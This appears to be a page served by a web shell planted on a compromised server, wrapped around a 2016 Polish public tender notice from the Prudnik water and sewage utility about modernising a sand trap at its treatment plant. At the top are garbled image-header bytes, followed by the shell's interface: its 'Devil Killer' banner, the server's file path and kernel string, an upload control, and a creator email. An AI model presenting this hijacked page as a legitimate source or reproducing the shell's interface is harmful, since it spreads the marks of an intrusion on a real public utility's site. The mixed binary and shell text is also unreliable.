JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160119/6691-N-2016.html

<p class="kh_header"><b>Prudnik: Modernizacja piaskownika na Miejskiej Oczyszczalni Ścieków w Prudniku</b><br>
<b>Numer ogłoszenia: 6691 - 2016; data zamieszczenia: 19.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji Jednoosobowa Spółka Gminy Prudnik Sp. z o.o. , ul. Poniatowskiego 1, 48-200 Prudnik, woj. opolskie, tel. 077 4363617, faks 077 4363617.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwikprudnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego ze 100% udziałem gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja piaskownika na Miejskiej Oczyszczalni Ścieków w Prudniku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Miejscem prac jest piaskownik na Miejskiej Oczyszczalnia Ścieków w Prudniku, ul. Poniatowskiego 7, 48-200 Prudnik. Teren oczyszczalni jest ogrodzony ogrodzeniem stałym, teren wokół obiektu modernizowanego jest zagospodarowany.
Piaskownik poziomy wykonany jest jako dwa równoległe koryta żelbetowe o przekroju prostokątnym z wykonanym w dolnej części korytem piaskowym. W celu zwiększenia skuteczności osadzania piasku doprowadzonej jest sprężone powietrze. Na koronie piaskownika na jego zewnętrznych ścianach zabudowany jest zgarniacz piasku, na pomoście zabudowane są dwie pompy do ewakuacji piasku. Zgarniacz pracuje w układzie automatycznym. Szlam ściekowy pompowany jest do rynny odciekowej zamontowanej na środkowej ścianie piaskownika.
Parametry techniczne piaskownika:
Długość			                   ok. 25,90 m
Szerokość 			      6,4 m
Głębokość		                    4,2 m

2. Modernizacja piaskownia obejmować będzie:
1) Wykonanie ogrzewania torów jezdnych piaskownika,
2) Odbudowa uszkodzonej korony bieżnej na 1 i nr 2 zgarniacza na grubości ok. 30 cm, wraz z wykonaniem zabezpieczenia powierzchni bieżni zgarniacza materiałem o wysokiej odporności na ścieranie z uwzględnieniem ciężaru pomostu i urządzeń zgarniacza,
3) Wykonanie i zabezpieczenie wewnętrzne części koryta piaskowników na całej powierzchni powłoka chemoutwardzalną,
4) Wykonanie zabezpieczenie zewnętrznych ścian piaskowników na całej powierzchni,
5) Odbudowa i wykonanie dylatacji piaskownika,
6) Zabezpieczenie antykorozyjne barierek ochronnych i konstrukcji pomostów,
7) Demontaż i montaż istniejącej instalacji napowietrzającej oraz prowadnice pomostu zgarniacza piaskownika.
3. Zakres robót. 
Zakres prac  przewidzianych dla niniejszego zamówienia przedstawiono w załączniku nr 10 - Szczegółowy opis robót modernizacyjnych i naprawczych piaskownika.

Przekroje i rzuty piaskownika wraz z wymiarami przedstawiono w załącznikach nr 11a, 11b, 11c, 11d.
Na ich podstawie Wykonawca musi zapoznać się z parametrami obiektu.

4. Wymagania organizacyjne:
a) Przed przystąpieniem do robót budowlanych objętych umową Wykonawca musi przejąć od Zamawiającego i przygotować teren i gdzie będą prowadzone prace.
b) Prace prowadzone przez wykonawcę w trakcie realizacji zamówienia nie mogą zakłócić normalnej pracy oczyszczalni ścieków i nie mogą pogarszać parametrów oczyszczania ścieków.
Prace należy prowadzić etapowo na działającym obiekcie w uzgodnieniu z Zamawiającym.
c) Wykonawca zamówienia odpowiedzialny jest za całość robót, za transport sprzętu i materiałów potrzebnych do realizacji zamówienia,
d) Wykonawca ponosi pełna odpowiedzialność za uszkodzenia urządzeń podziemnych (kable energetyczne, telekomunikacyjne, wodne lub deszczowe) związane z wykonaniem prac,
e) Wykonawca musi dysponować odpowiednim sprzętem koniecznym do wykonania zamówienia,
f) Wykonawca jest odpowiedzialny za utrzymanie porządku, uporządkowanie oraz przywrócenie terenu do stanu sprzed przystąpienia do robót, w szczególności do deformacji terenu spowodowanej sprzętem budowlanym, 
g) Wykonawca robót zapewni nadzór techniczny oraz obsługę geodezyjną zamówienia, nadzór nad pracownikami w zakresie porządku i dyscypliny pracy, koordynację działań ewentualnych podwykonawców, zapewni pracownikom warunki socjalne, zabezpieczy zaplecze budowy, oznakuje i zabezpieczy teren wykonywania prac.
h) Wykonawca odpowiedzialny jest za zapewnianie zaplecza higieniczno - sanitarnego oraz socjalnego dla swoich pracowników. 
i) Wykonawca jest odpowiedzialny, za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.
j) Wszelkie koszty mediów (energia elektryczna, woda, ścieki) związane z realizacja przedmiotu zamówienia ponosi Wykonawca.
k) Wykonawca musi ustalić z kierownictwem Miejskiej Oczyszczalni Ścieków w Prudniku sposób zabezpieczenia przed uciążliwością prac budowlanych.
l) Wykonawca zapewnia materiały potrzebne do realizacji zadania.
m) Zamawiający wymaga nadzór Producenta materiałów budowlanych nad przebiegiem prac remontowych.
5. Wykonawca zamówienia musi załączyć do oferty przetargowej opis, karty katalogowe i nazwę producenta dla materiałów budowlanych które zamierza wykorzystać w trakcie realizacji zamówienia.
Wykonawca zamówienia musi załączyć do oferty przetargowej opis technologii i sposobu wykonania podgrzewanych torów jezdnych piaskownika. 

6. Zamawiający powoła koordynatora (koordynatorów) robót.
7. Wizja lokalna:
Zamawiający zaleca Wykonawcy przeprowadzenie wizji lokalnej na Miejskiej Oczyszczalni Ścieków w Prudniku, ul. Poniatowskiego 7, 48-200 Prudnik  - w miejscu planowanych robót. Wizja lokalna ma na celu zapoznanie i zbadanie miejsca prowadzenia prac jak i jego otoczenia, oraz uzyskania potrzebnych informacji dotyczących wykonania przedmiotu zamówienia przed złożeniem oferty przetargowej. 
 Termin wizji lokalnej powinien być ustalony z Zamawiającym telefonicznie lub pisemnie, z co najmniej 1 dniowym wyprzedzeniem. Wizja lokalna może odbyć się do dnia: 01.02.2016r., w godzinach od 7:00 do 13:00.

8.  Warunki gwarancji: 
Zamawiający wymaga od Wykonawcy udzielenia gwarancji na okres minimum 24 miesięcy na cały zakres zamówienia określonego w SIWZ.
Okres gwarancji liczony jest od daty podpisania (bez uwag) protokołu końcowego.
W ramach gwarancji Wykonawca zobowiązuje się do usuwania awarii, wad i usterek na własny koszt w terminie nie dłuższym niż 7 dni od daty zgłoszenia przez Zamawiającego.
Niezależnie od gwarancji Zamawiający jest uprawniony do realizacji praw z tytułu rękojmi. Okres rękojmi jest równy okresowi gwarancji.  

9. Informacja na temat możliwości powierzenia przez Wykonawcę wykonania części prac lub w całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom, wówczas zastosowanie mają art. 143b, 143c, 143d Pzp. W takim przypadku zobowiązany jest do wskazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom, lub powiadomić Zamawiającego o tym fakcie w trakcie realizacji inwestycji w formie pisemnej. Nadzór nad pracami podwykonawców sprawuje Wykonawca zamówienia.
10.  Warunkiem odbioru robót będzie:
1). Pozytywnie przeprowadzone próby dla podgrzewanych torów jezdnych.
2). Przekazanie Zamawiającemu instrukcji obsługi i konserwacji ogrzewanych torów jezdnych.
3). Przekazanie protokołów pomiarowych kontrolnych instalacji elektrycznej dla podgrzewanych torów jezdnych.
4). Przekazanie zamawiającemu: kart katalogowych, świadectw  jakości dla materiałów budowlanych użytych w realizacji zamówienia.
5). Przedstawienie i przekazanie Zamawiającemu kart gwarancyjnych.
6). Przeszkolenie pracowników Zamawiającego (w liczbie min. 10 osób) z obsługi i eksploatacji instalacji do ogrzewania torów jezdnych piaskownika. 
7). Spisanie protokołu obioru końcowego.

Przewiduje się odbiory częściowe przewidziane dla określonego rodzaju robót. Wykonawca zamówienia musi zgłosić zakończenie określonych robót celem kontroli w celu uzyskania pozwolenia do przystąpienia do kolejnych prac. Brak zgłoszenia Zamawiającemu zakończania prac ulęgających zanikowi i zakryci może spowodować wstrzymanie realizacji zadnia z winy Wykonawcy.

11. Wszędzie tam gdzie w SIWZ do opisu zamówienia użyto nazwy marki/producenta przyjmuje się, że mogą być zastosowane rozwiązania równoważne (nie gorsze) lub lepsze. Wskazane marki, typu czy producenta ma charakter jedynie przykładowy i użyte jest w celu określenia standardów, jakości i klasy wymaganych w odniesieniu do stosowanych materiałów.
Zamawiający przewiduje możliwość zastosowania materiałów zamiennych.

12. Rozliczenie za wykonane roboty (bez zastrzeżeń), odbędzie się po dostarczeniu przez Wykonawcę zamówienia fakturę VAT z podanym kontem bankowym. Faktura powinna być z 30 dniowym terminem płatności.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. do 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.00.00.00-7, 45.10.00.00-8, 45.30.00.00-0, 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę wadium w wysokości: 6000,00 zł. (słownie: sześć tysięcy złotych).
Wadium wnosi się przed upływem terminu składania ofert.
W przepadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na rachunek bankowy Zamawiającego:
            ING Bank Śląski S.A. O/Nysa.
             Nr rachunku: 58 1050 1490 1000 0022 7794 8770.
Do oferty należy dołączyć oryginał lub kopię polecenia przelewu potwierdzoną: za zgodność z oryginałem.
Wadium wnoszone w innych dopuszczalnych przez Zamawiającego formach w oryginale dołączyć do oryginału oferty</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stwierdzi, iż Wykonawca spełnił warunki w zakresie wiedzy i doświadczenia:
jeśli wykaże, że w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenia niniejszego zamówienia, a jeśli okres działalności Wykonawcy jest krótszy to w okresie tej działalności, co najmniej 2 (dwóch) różnych zadań polegających na przeprowadzeniu modernizacji oczyszczalni ścieków lub obiektów oczyszczalni ścieków (dopuszczalne są obiekty wodociągowe) przy wykorzystaniu oferowanych materiałów budowlanych, o wartości nie mniejszej niż 100 000,00 PLN każde zadanie. W celu potwierdzenia spełnienia niniejszego warunku Wykonawca zobowiązany jest przedłożyć:
- wykaz wykonanych zamówień w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielnie niniejszego zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania, sporządzony według wzoru stanowiącego załącznik nr 6. 
Wykonawca załącza do dokumentacji ofertowej dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia tj.:
a) wykaże, iż dysponuje osobą, która będzie pełnić obowiązki kierownikiem robót budowlanych.
Osoby te muszą posiadać: 
- wykształcenie techniczne, wymagane kwalifikacje i uprawnienia. Osoba taka powinna być członkiem właściwej Izby Samorządu Zawodowego potwierdzoną zaświadczeniem wydanym przez tę izbę z określonym w nim terminem ważności.
Wykonawca musi przedstawić w ofercie informacje na temat kwalifikacji zawodowych, doświadczenia i wykształcenia wyżej opisanych osób, które będą uczestniczyć w wykonaniu zamówienia - według wzoru stanowiącego załącznik nr 7.
Osoby ta muszą uczestniczyć, kierować i prowadzić nadzór nad robotami branżowymi w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zamówienia musi załączyć do oferty przetargowej opis, karty katalogowe i nazwę producenta dla materiałów budowlanych które zamierza wykorzystać w trakcie realizacji zamówienia.
Wykonawca musi załączyć do oferty przetargowej opis przyjętej technologii i sposobu wykonania podgrzewanych torów jezdnych piaskownika.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 91</li>
<li>2 - Gwarancja - 9</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwikprudnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa Spółka Gminy Prudnik z o.o.  ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2016 godzina 10:00, miejsce: Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa Spółka Gminy Prudnik z o.o.  ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wojewódzki Fundusz Ochrony Środowiska i Gospodarki Wodnej w Opolu.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com